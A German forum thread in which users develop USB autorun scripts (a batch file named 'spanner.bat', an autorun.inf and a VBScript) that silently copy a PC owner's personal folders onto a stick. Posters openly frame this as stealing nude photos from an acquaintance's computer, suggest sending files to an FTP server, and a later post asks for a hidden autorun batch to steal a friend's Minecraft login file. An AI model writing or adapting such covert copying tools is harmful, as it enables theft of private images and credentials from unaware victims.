freier Bannerplatz

Sie sind nicht angemeldet.

  • »BOS-Info.net« ist der Autor dieses Themas

Beiträge: 139

Wohnort: Ahrensburg

Beruf: Schüler

Danksagungen: 493

  • Nachricht senden

1

Montag, 1. Juni 2009, 02:04

Daten Automatisch auf den USB Stick Kopieren

Moin,
ich möchte gerne wichtige Daten auf einen USB Stick kopieren, dabei habe ich es mir so gedacht, das ich einen bestimmten USB Stick habe auf den eine autorun.inf ist und eine zweite datei öfnet die dann die datein von C:\Dokumente und Einstellungen\Arbeiten\Eigene Dateien kopiert.

Ich würde mich freuen wenn ihr mir helfen könntet, gedacht wäre es als Batch datei, da man begebenden falls denn Fad ändern kann.
...Wolf in Soul, wolf in mind- being one, that would be kind...


Beiträge: 26

Wohnort: Zuhause bei www.modding-faq.de ;)

Danksagungen: 49

  • Nachricht senden

2

Montag, 1. Juni 2009, 10:46

Um was gehts dir? Nur um das synchronisieren an sich?
Da nimm nen Prog wie SyncDir oder so. Kannste meist einstellen das alle x Minuten (oder beim Anstecken des Sticks) gewisse Ordner synchronisiert werden.
Da biste wenigstens Laufwerksbuchstabenun-abhängig ;)

lG,
TT_Kreischwurst
--- Auch Dummheit ist eine Gabe Gottes.
Man sollte sie jedoch nicht missbrauchen---

Beiträge: 1 632

Beruf: Böser IT-Mensch

Danksagungen: 2057

  • Nachricht senden

3

Dienstag, 2. Juni 2009, 10:23

Ich glaube er will das gleiche wie ich:
Ab zur freizügigen, versauten Bekannten, in einem unbeobachteten Moment USB-Stick rein - *Kopiert Eigene Bilder* - USB Stick raus und wieder ab nach Hause, Beute anschauen :D

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

4

Dienstag, 2. Juni 2009, 16:27

Einfach eine kleine Batch schreiben.
Könnte bspw. so aussehen:

Quellcode

1
2
3
@echo off
xcopy "Y:\xyz\abc\def" X:\abc\def_backup /Y /D /E /I
pause

Der würde jetzt alle neuen Daten (/D) inkl. Unterverzeichnissen (/E) in "Y:\xyz\abc\def" kopieren, altes ohne Nachfrage überschreiben (/Y) und neue Ordner anlegen (/I).
Nur weiß ich nicht, ob man xcopy unabhängig von einem Laufwerksbuchstaben betreiben kann. Lässt sich sicher ergooglen.
EDIT:
Was auch ginge, allerdings nur an PC's mit Internetverbindung und evtl. ohne Firewall, wäre, die Dateien an einen FTP-Server zu senden.
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

Beiträge: 1 632

Beruf: Böser IT-Mensch

Danksagungen: 2057

  • Nachricht senden

5

Dienstag, 2. Juni 2009, 16:42

Und jetzt noch mit autostart und alle Hobbyvoyeure sind glücklich :D

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

6

Dienstag, 2. Juni 2009, 17:29

spanner.bat sähe so aus:

Quellcode

1
2
3
@echo off
xcopy "Y:\kopiermich" X:\hierher /Y /D /E /I
pause

autostart.inf sähe so aus:

Quellcode

1
2
[autorun]
open = spanner.bat

Da Windows aber für den USB Stick an einem anderen Rechner wahrscheinlich auch einen neuen Buchstaben zuweisen wird, funktioniert xcopy nur in den Fällen, wo das identisch ist.
Was gehen müsste, aber zu höchster Verwirrung führen kann, wäre ein paar "IF EXIST"'s hinzuzufügen.
Man zieht für den USB Stick also alle möglichen Laufwerksbuchstaben in Betracht. "\aufdemUSBStick\ gibt man vorzugsweise einen Namen, der mit Sicherheit nicht auf der Festplatte bzw. Wechseldatenträgern des/der Bespannten vorhanden ist. Nicht dass er/sie seine eigenen Nacktbilder dann im Ordner "\Spiele\" wiederfindet ;-D.
Kann man aber garantiert sauberer "coden".
Der Standardordner für "Eigene Bilder" müsste sein: "C:\Dokumente und Einstellungen\[Benutzer]\Eigene Dateien" (müsst ihr mal nachgucken, bei mir ist "Eigene Dateien" nicht auf C:) in der Batch also: "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder".


spanner.bat sähe dann so aus:

Quellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
@echo off

IF EXIST "A:\aufdemUSBStick\" GOTO AUFA
IF EXIST "B:\aufdemUSBStick\" GOTO AUFB 
IF EXIST "D:\aufdemUSBStick\" GOTO AUFD 
IF EXIST "E:\aufdemUSBStick\" GOTO AUFE 
IF EXIST "F:\aufdemUSBStick\" GOTO AUFF 
REM und so weiter wenns sein muss...

:AUFA
xcopy "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder" A:\aufdemUSBStick /Y /D /E /I

:AUFB
xcopy "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder" B:\aufdemUSBStick /Y /D /E /I

:AUFD
xcopy "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder" D:\aufdemUSBStick /Y /D /E /I

:AUFE
xcopy "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder" E:\aufdemUSBStick /Y /D /E /I

:AUFF
xcopy "%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\Eigene Dateien\Eigene Bilder" F:\aufdemUSBStick /Y /D /E /I

REM und so weiter...

PAUSE

EDIT:
Versteckte Dateien wollt ihr wahrscheinlich ja auch haben :D Da muss als Parameter dann noch "/H" hin. "/R" zum Überschreiben schreibgeschützter Dateien wäre neben "/C" damit er auch wenn's Fehler gibt weitermacht, ebenfalls nicht schlecht.
EDIT2:
M'kay da stimmt was nicht :-/
EDIT3:
Klar, bei mir kann's auch nicht funktionieren, da der Kram ja ganz woanders ist... Also auf ein neues :-D
EDIT4:
geht aber trotzdem nicht, wahrscheinlich wegen der Leerzeichen in den Dateinamen.
EDIT5:
Doof, xcopy oder Parameter sind falsch, mit copy läuft's (abgeändert zumindest... :-D)
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

Dieser Beitrag wurde bereits 5 mal editiert, zuletzt von »MasterAndrew« (2. Juni 2009, 18:04)


xxneoxx

Fortgeschrittener

Beiträge: 292

Wohnort: Wölfersheim

Beruf: Industriemechaniker / Luftsicherheitsassistent / Bürokaufmann

Danksagungen: 402

  • Nachricht senden

7

Freitag, 5. Juni 2009, 17:55

das klingt ja mal interessant ^^

wenn der das Kopieren anfängt, sieht man das dann im Windows betrieb ? ( Popup Fenster mit Statusbalken oder so ? ) ?


Die funktion mit dem schnellen sichern find ich gut, bräuchte sowas für mich und die Arbeit, da ich gewissen Dateien mit nach Hause nehmen um dort weiter zu bearbeiten (kurz USB Stick rein, drauf kopiert ohne schnick schnack meldung und fertig)
- Sharkoon Rebel9 Value-Edition
- ASUS P5B Deluxe WiFi-AP
- Intel Core 2 Duo E6600 @ 3000
- Arctic-Cooling Freezer 7 Pro
- Zotac Geforce 8800 GTS 640MB
- G.E.I.L. 2GB Kit DDR2-800
- Samsung 250GB SATA
- VISTA Ultimate (32Bit)

Hab jetzt mal Windows 7 getestet gehabt = 1 : 1 Kopie von Vista, nur mit neuem Namen + 3 bis 4 Zusätzlichen Tools
Und dann sagen sie Windows 7 beste Windows aller Zeiten und Vista das schlechteste aller Zeiten oO

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

8

Freitag, 5. Juni 2009, 18:20

das klingt ja mal interessant ^^

wenn der das Kopieren anfängt, sieht man das dann im Windows betrieb ? ( Popup Fenster mit Statusbalken oder so ? ) ?


Die funktion mit dem schnellen sichern find ich gut, bräuchte sowas für mich und die Arbeit, da ich gewissen Dateien mit nach Hause nehmen um dort weiter zu bearbeiten (kurz USB Stick rein, drauf kopiert ohne schnick schnack meldung und fertig)

Das da ist ein einfaches Batch-Skript, sieht also genauso aus, wie wenn du Ausführen - "cmd" machst. Da stünde dann "blablubb wurde kopiert".
Nur blöderweise funktioniert das irgendwie gar nicht, was ich da zurechtgesnuggled habe. Schätzungsweise stimmt mit den Parametern was nicht. Mit dem Befehl "copy", welches keine Ordnerstrukturen übernehmen kann und meine ich auch nicht in der Lage ist, ältere Dateien durch neuere zu ersetzen, statt "xcopy" geht das ganze nämlich... Am Aufbau liegt's demnach nicht.
Sowas ist eigentlich auch recht einfach in VBScript zu schreiben, nur habe ich das seit Jahren nicht gemacht und dazwischen nur php und Batch gespielt, mal sehen, ob ich da noch genügend drauf habe :-/
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

Locutus

Meister

Beiträge: 2 137

Wohnort: TU Dresden

Beruf: Student, Elektrotechnik auf Diplom

Danksagungen: 7463

  • Nachricht senden

9

Freitag, 5. Juni 2009, 23:23

könnte man so was nicht eigentlich auch direkt in die autorun.inf schreiben? ist doch auch so ähnlich wie nen batch und wenn man da nun nen kompletten batch-befehl reinpackt? und war es nicht auch möglich, xcopy und co. silent auszuführen?




xxneoxx

Fortgeschrittener

Beiträge: 292

Wohnort: Wölfersheim

Beruf: Industriemechaniker / Luftsicherheitsassistent / Bürokaufmann

Danksagungen: 402

  • Nachricht senden

10

Samstag, 6. Juni 2009, 12:50

Ich hab von sowas garkeine Ahnung ... hab noch nie was programmiert geschweige denn gelernt.
Wenn ich das jetzt so durchlese würde ich jetzt zur NOT noch eine Autorun.inf oder bat datei hinbekommen. aber was da rein muss keine Ahnung.
Aber lustig ist es schon, denn die Programmierung sieht ja fast aus wie in CS ne config machen :)
- Sharkoon Rebel9 Value-Edition
- ASUS P5B Deluxe WiFi-AP
- Intel Core 2 Duo E6600 @ 3000
- Arctic-Cooling Freezer 7 Pro
- Zotac Geforce 8800 GTS 640MB
- G.E.I.L. 2GB Kit DDR2-800
- Samsung 250GB SATA
- VISTA Ultimate (32Bit)

Hab jetzt mal Windows 7 getestet gehabt = 1 : 1 Kopie von Vista, nur mit neuem Namen + 3 bis 4 Zusätzlichen Tools
Und dann sagen sie Windows 7 beste Windows aller Zeiten und Vista das schlechteste aller Zeiten oO

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

11

Samstag, 6. Juni 2009, 19:38

autorun.inf ist nur in der Lage, ein paar Anweisungen zu geben, kann aber sonst nichts. Verzweigungen und eine Kopieranweisung, die hier auf jeden Fall nötig sind, gehen z.B. nicht. Außer "open", "icon" und "action" gibt's glaube ich auch nur noch "shell" und "shellexecute". Reicht aber definitiv nicht aus. Das Skript sollte sich aber auch nur auf eine Datei belaufen, bisschen komfortabler vielleicht mit einer .ini oder so, daher denke ich geht das.
Was das silent ausführen angeht bin ich mir nicht sicher, ich meine das geht mit Batches nicht.
Stimmt tatsächlich, bei CS sieht's nicht viel anders aus :) Mein erstes "Skript" bestand auch aus einer Desert Eagle, einer MP5, Ammo, ein paar Granaten und Kevlar auf F5 :lol
Also rein von der Idee her ist das Ding, was ich mit den xcopy's gebastelt habe jedenfalls richtig, nur ist mit den Parametern oder was anderem direkt bei den xcopys nicht im Reinen, müsstet ihr mal googlen. Ich bin grad dabei das ganze etwas komfortabler in VBScript zu schreiben, das sollte besser klappen und ist denke ich auch einfacher zu durchblicken (wenn's denn funktioniert...) Mal sehen ob's übers Wochenende noch was wird, ich darf noch Lessings Ringparabel komplett analysieren und interpretieren :kotz
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

Luxovious

Global-Mod

Beiträge: 1 614

Wohnort: Heidelberg

Beruf: Student - Chemie

Danksagungen: 67

  • Nachricht senden

12

Samstag, 6. Juni 2009, 19:46

Das hier zum Thema Ringparabel.
Zum Thema Proggn hab ich leider eine Ahnung ;)
Gruß Luxo
Nichts ist wie es scheint

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

13

Sonntag, 7. Juni 2009, 00:01

Das hier zum Thema Ringparabel.
Zum Thema Proggn hab ich leider eine Ahnung ;)
Gruß Luxo

Danke, ich war tatsächlich doof genug, den Abschnitt bei jeder Suche bei Wikipedia irgendwie zu übersehen :lol

Ich habe es jetzt endlich gebacken bekommen, der Spaß besteht jetzt aus zwei Skripts, der autorun.inf und später noch einer .txt, die vom ersten Skript erstellt wird. :)
Ich denke mal es ist nicht schlecht, wenn ich die Skripts jeweils ein bisschen aufdrösele und erläutere und nochmal anhänge...

No. 1 ist eine Batch-Datei: (EigeneDateien.bat)

Quellcode

1
2
3
4
@echo off 
echo %HOMEDRIVE%%HOMEPATH%\Eigene Dateien\>"EigeneDateien.txt"
echo %USERNAME%>>"EigeneDateien.txt" 
call copy.vbs

Zeile eins sagt, dass das Skript nichts ausgeben soll.
Zeile zwei sagt, dass das Skript den üblichen von Windows (XP übrigens, wenn der bei Vista abweicht müsst ihr Bescheid sagen) festgelegten Ort für die Eigenen Dateien (also "C:\Dokumente und Einstellungen\USERNAME\Eigene Dateien\") ermitteln und in eine Textdatei ("EigeneDateien.txt") schreiben soll (Das funktioniert natürlich nur, wenn der User den Ordner "Eigene Dateien" nicht auf ein anderes Laufwerk oder einen anderen Ordner als (im Normalfall) C:\Dokumente und Einstellungen\USERNAME\Eigene Dateien" verschoben hat.) Wenn also zum Beispiel nur Dateien aus "Eigene Bilder" kopiert werden sollen, muss im Skript hinter "[...]\Eigene Dateien\" natürlich noch "Eigene Bilder" stehen.
Außerdem schreiben wir noch den Usernamen in die Textdatei. (zweimal ">>", da der nur dazu geschrieben wird, beim nächsten Ausführen des Skriptes wird wieder der gesamte Inhalt mit dem ort überschrieben, es sind also nie mehr als zwei Zeilen belegt)
Anschließend ruft die Batch das eigentliche Skript, also die copy.vbs auf.

Jetzt die etwas komplexere in VBScript geschriebene "copy.vbs":

Quellcode

1
2
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives

gewährt den Zugriff auf das Dateisystem des Rechners und ermöglicht es dem Skript, Dateien und Ordner zu manipulieren, die zweite Zeile "kollektiviert" alle vorhandenen Laufwerke und macht diese in einer Collection zugängig und überprüfbar

Quellcode

1
2
const CopyDir = "xxx"
const RemovableDir = "yyy"

Hier wird die "CopyDir", der Ordner, der kopiert werden soll, und die "RemovableDir", also der Name des Ordners, auf den die Dateien kopiert werden, eingetragen.
Für die CopyDir muss natürlich nichts eingesetzt werden, wenn ihr aus einem Ordner in "Eigene Dateien" kopieren wollt, da dieser Ordner dann ja bereits von "EigeneDateien.bat" lokalisiert wurde und an "EigeneDateien.txt" übergeben wurde. Am besten setzt ihr in dem Falle einfach ein Apostroph vor diese Zeile, dann ist sie ein Kommentar, bzw. wird vom Skript nicht berücksichtigt.
Für die "RemovableDir" darf natürlich kein Laufwerksbuchstabe eingegeben werden, da es ja Ziel des Skripts ist, diesen herauszufinden. (Wenn bei euch am Rechner der Zielordner auf dem USB Stick als "U:\Wurst\Brot\Käse\" angezeigt wird, tragt für die "Removable Dir" " "Wurst\Brot\Käse" " ein.)

Quellcode

1
2
3
4
5
6
const ForReading = 1
Set objTextFile = objFSO.OpenTextFile("EigeneDateien.txt", ForReading)
do until objTextFile.AtEndOfStream
    EigeneDateien = objTextFile.Readline
    foldername = objTextFile.Readline
loop

[/code]
Das war eigentlich der schwerste Teil des Codes, finde ich:
Die erste Zeile definiert die Art des Lesens (glaube ich zumindest, einen anderen Wert habe ich nie verwendet). Die zweite erlaubt es uns, vom zuvor gewährten Zugriff auf das Dateisystem Gebrauch zu machen, indem wir nun die "EigeneDateien.txt" öffnen. Die Schleife läuft sooft durch, bis "AtEndofStream" ("Am Ende des Dokuments") TRUE ergibt. Die erste Zeile der "EigeneDateien.txt", sprich der Ort der zu kopierenden Dateien (wenn nicht mit CopyDir genau festgelegt) wird in der Variable "EigeneDateien" gespeichert, die zweite, also der Username, wird in "foldername" abgelegt, da sie später Teil der Namensgebung für den Zielordner sein soll.
Die Schleife läuft also, da unser Dokument nur zwei lesbare Zeilen hat, genau einmal durch.

Quellcode

1
2
3
4
5
6
7
8
For Each objDrive in colDrives
    TestFolder = objDrive.DriveLetter & ":\" & RemovableDir
    If objFSO.FolderExists(TestFolder) Then
    Set objFolder = objFSO.GetFolder(EigeneDateien)
    objFolder.Copy TestFolder & "\" & foldername & "[" & date & "]" 
    Stop
    End If
Next

Mit der nächsten Schleife wird für jedes "objDrive" in "colDrives", also jeder Laufwerksbuchstabe in der zuvor erstellten "Collection" der Anweisungsblock der sich zwischen "For Each [...]" und "Next" ("nächstes objDrive", also nächster Durchlauf), durchgeführt.
Die Variable "TestFolder" erhält nun den Wert des zuerst durchlaufenen Laufwerksbuchstaben, ein "\" und den Wert der "RemovableDir", den wir vorher bestimmt haben.
Haben wir jetzt also den USB Stick angeschlossen, auf dem sich zum Beispiel der Ordner "wurst" garantiert befindet, wird über die "For Each ... Next" Schleife nun für "TestFolder" der Wert "A:\wurst" eingesetzt.
In der folgenden Verzweigung wird überprüft, ob der Pfad, bzw. der Ordner, der nun Wert von "TestFolder" ist, existiert. Das ist für den ersten Durchlauf, zumindest wenn die Buchstaben nicht verstellt wurden, unwahrscheinlich, da "A:\" das Diskettenlaufwerk sein sollte.
Ist dem nicht so (wird also die Bedingung "existiert der Ordner A:\wurst ?" nicht erfüllt) werden die Anweisungen zwischen "Then" und "End If" nicht ausgeführt, es geht bei "Next" weiter und die "For Each ... Next" geht von vorne los. Als nächstes Laufwerk wird nun "C:\" eingesetzt (falls vorhanden) und überprüft usw.
Ist die Bedingung für die "If ... Then" irgendwann erfüllt, dann folgt der Anweisungsblock zwischen "Then" und "End If". Der besagt, dass auf auf den Pfad, der aus der "EigeneDateien.txt" an die Variable "EigeneDateien" weitergegeben wurde, nun zugegriffen werden darf (wenn der Zugriff auf eine festgelegte "CopyDir" geschehen soll, muss "EigeneDateien" durch "CopyDir" ersetzt werden). In der nächsten Zeile wird dieser Ordner jetzt in das Verzeichnis der Variable "TestFolder" kopiert, dessen Existenz wir mit der If Bedingung überprüft und bestätigt haben. Damit man später die Daten unterscheiden kann, habe ich den Ordner nach der Variable "foldername", also dem Benutzernamen desjenigen, von dem Dateien kopiert wurden, sowie das Datum erweitert. Die genaue Uhrzeit ist leider nicht möglich, da diese in ihrer Ausgabe Doppelpunkte enthält.
Es folgt die letzte Anweisung in der "If ... Then" - "Stop", damit wird die "For Each ... Next" vorzeitig abgebrochen, die If Verzweigung wird mir "End If" beendet und das Skript hat seine Aufgabe erfüllt :)

Benutzt für den Ordner, wo das Zeug am Ende landen soll lieber nicht "Windows", "Programme" oder andere Namen, die definitiv oder sehr wahrscheinlich schon vergeben sind, sonst habt ihr am Ende gar nichts und der andere alles doppelt ;)
Über Fragen, Änderungswünsche, Kritik etc. würde ich mich natürlich freuen. Ich werde wohl noch eine Logfile (Anzahl, und Datenmenge der kopierten Daten, sowie Zeitpunkt und Zeitspanne des Kopierens) Funktion hinzufügen, evtl. noch ein schönes Formular, dann muss man an den Scripts gar nicht mehr manuell rumschreiben.

Wer übrigens ebenfalls gerne mal ein paar Skripts schreiben möchte (macht Spaß, das sage ich euch :-P) dem empfehle ich, sich mal mit php auseinanderzusetzen (html Vorkenntnisse, z.B. von Selfhtml wären nicht schlecht, sind aber eigentlich nicht unbedingt nötig, als bestes Tutorial für php erachte ich das von php-quake.net. Sprachen wie VBScript, welches ich da oben benutzt habe, sind dann wesentlich einfacher zu erlernen und können natürlich auch viel mehr. (An die Hochsprachen werde ich mich demnächst auch mal wagen, macht einfach zu viel Spaß um auf einem Niveau zu verweilen :D )

EDIT:
Ist ja winzig, der Post... :D

Das Skript ist nur knapp 1KB groß ;)
Die Autorun.inf sieht genauso aus wie im anderen Post, nur dass jetzt "EigeneDateien.bat" aufgerufen wird (die kann aber auch umbenannt werden)
»MasterAndrew« hat folgende Datei angehängt:
  • Desktop.zip (1,05 kB - 603 mal heruntergeladen - zuletzt: 15. September 2014, 03:06)
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

14

Montag, 14. November 2011, 10:03

hallo MasterAndrew

edit: thema hat sich erledigt, jedoch eine andere frage

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »ulmer« (16. November 2011, 22:41)


15

Mittwoch, 16. November 2011, 22:42

also hier meine frage:

ich würde gerne 2 gezielte ordner ausführen, wie ist dies möglich mit der txt datei und mit bat und vbs kann mir jemand unter die arme greifen?

MasterAndrew

Fortgeschrittener

Beiträge: 550

Wohnort: Hamburg

Beruf: Arzt in spe, UKE

Danksagungen: 1878

  • Nachricht senden

16

Samstag, 3. Dezember 2011, 01:07

Hi ulmer! Ja, das mit der autostart.inf hat irgendwie damals schon nicht so geklappt, wie ich mir das vorgestellt habe. Entweder funktioniert das auf USB-Datenspeichern nicht ganz so easy, vielleicht ist auch aus Sicherheitsgründen bei den neueren Betriebssystemen ("damals" hatte ich wahrscheinlich noch Win XP) was ganz anderes im Busch. Da kann ich leider auf Anhieb auch nicht weiterhelfen; ich hab' auch momentan leider echt zu wenig Zeit, mich damit näher auseinander zu setzen. Tendenziell findet man zu jeder Skriptsprache jede Menge Tutorials, klaubare Beispiele etc.
LENOVO B560 (i3 M 370, 4 GB RAM, Crucial M4 64 GB)

17

Mittwoch, 18. April 2012, 22:51

Hi!

Also ich kenne ja den Reiz des Selberprogrammierens.. :D Allerdings versteh ich nicht, warum man es sich in dem Fall nicht leicht machen sollte? Ich kann dir PureSync wärmstens empfehlen, das ist für deine Zwecke mehr als nur ausreichend.

Falls du aber selbst noch einmal genauer schauen möchtest:

HIER findest du zahlreiche Alternativen!

Liebe Grüße!

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »Ju$tMe_2110« (19. April 2012, 00:16)


18

Donnerstag, 11. Juli 2013, 22:33

Hey Leute ich bin neu im forum, und hätte eine bitte ich würde gerne mich an einen "Freund" rächen denn er stahl mir meinen Minecraft Account und spielt jetzt damit :/
So meine bitte ist ich will ich meinen account zurückholen indem ich ihm einen stick mit einen angeblichen "Film" der darauf gespeichert ist gebe, wenn er den Usb stick öffnet soll eine Autostart datei eine batch datei öffnen die aus diesen pfad --> C:\%HOMEDRIVE%\%HOMEPATH%\%USERNAME%\AppData\Roaming\.minecraft\lastlogin die sogenannte "Lastlogin" datei kopiert und auf ein verstecktes verzeichnes namens "test" kopiert das auf dem Usb stick liegt das ganze sollte wenn möglich 007 ähnlich verlaufen und ohne anzeichen im hintergrund rübergeschickt werden.
Dazu muss man beachten das wenn der Usb stick auf meinen computer den anfang I:/ hat aber dar das bei jeden computer verschieden ist sollten die anfänge A-I sein dazu soll keine batchdatei auf dem stick zu sehen sein genau so wenig wie die autostart datei.

Wär echt nett wenn jemand die Batch datei + die Autostart datei senden oder als text Posten würde.

Liebe Grüße!

19

Donnerstag, 25. Juli 2013, 09:47

Haha wirst du dann noch etwas peinliches oder echt nervendes in "seinem" Namen machen oder geht's wirklich nur darum den Account zurückzuholen? Du könntest dir ja theoretisch einfach einen neuen Account zulegen und dich mit Hilfe des anderen richtig schön rächen :--D

Thema bewerten
Werbung